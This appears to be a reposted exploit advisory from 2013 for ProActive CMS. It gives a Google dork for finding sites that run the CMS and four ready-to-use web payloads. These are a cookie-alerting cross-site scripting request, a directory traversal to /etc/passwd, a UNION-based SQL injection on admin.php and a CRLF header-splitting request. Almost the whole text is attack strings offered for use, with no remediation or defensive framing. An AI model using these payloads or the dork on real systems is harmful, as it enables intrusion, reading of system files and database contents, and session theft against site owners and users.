# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Date: 12.1.2013
# Exploit Author: Mormoroth
# Vendor Homepage: ProActive CMS
# Tested on: Linux
---------Cross Site Scripting---------
index.php?action=search&q=1</title>1<script >alert(document.cookie)</script>
---------Directory Traversal----------
/lavate/cute.old/Dialogs/Tag.Frame.php?setting=&Style=../../../../../../../../../../etc/passwd.jpg&Tab=Style&Tag=&Theme=&UC=
---------SQL Injection----------------
admin.php?action=helpSWF&id=1/**/union/**/select/**/1,@@version,3,4/*
---------HTML Spilitting--------------
/index.php?action=verifimage&code=%0d%0a%20Inject Your Own Code
0 yorum: